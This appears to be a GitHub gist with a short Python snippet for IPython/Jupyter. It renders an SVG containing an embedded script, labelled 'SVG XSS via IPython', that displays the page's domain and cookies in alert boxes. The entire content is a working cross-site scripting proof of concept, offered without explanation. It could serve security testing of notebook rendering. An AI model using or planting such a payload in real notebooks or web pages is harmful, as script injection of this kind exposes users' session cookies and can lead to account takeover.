Created
December 27, 2025 02:37
-
-
Save x0root/38aa62dbe5ae0592b2c8847b7f4c38bb to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from IPython.display import HTML, display | |
| svg_payload = """ | |
| <svg xmlns="http://www.w3.org/2000/svg" width="500" height="200"> | |
| <rect width="100%" height="100%" fill="black"/> | |
| <text x="20" y="40" fill="lime" font-size="16"> | |
| SVG XSS via IPython | |
| </text> | |
| <script> | |
| alert("Domain: " + document.domain); | |
| alert("Cookie: " + document.cookie); | |
| </script> | |
| </svg> | |
| """ | |
| display(HTML(svg_payload)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment